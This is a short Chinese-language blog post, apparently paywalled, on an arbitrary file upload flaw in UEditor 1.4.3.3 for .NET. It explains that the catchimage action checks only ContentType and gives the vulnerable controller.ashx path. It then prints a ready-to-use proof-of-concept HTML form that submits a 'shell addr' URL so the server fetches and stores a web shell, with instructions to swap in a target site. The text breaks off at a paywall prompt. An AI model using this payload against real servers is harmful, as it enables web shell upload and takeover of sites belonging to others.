漏洞介绍
该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET
漏洞原理
获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传
漏洞实战
通过目录扫描到站点下存在ueditor编辑器
通过访问指定路径的返回判断存在漏洞
http://xxx/ueditor/net/controller.ashx?action=catchimage
poc为如下 把xxx更换为目标站点即可
<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>通过post数
最低0.47元/天 解锁文章
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
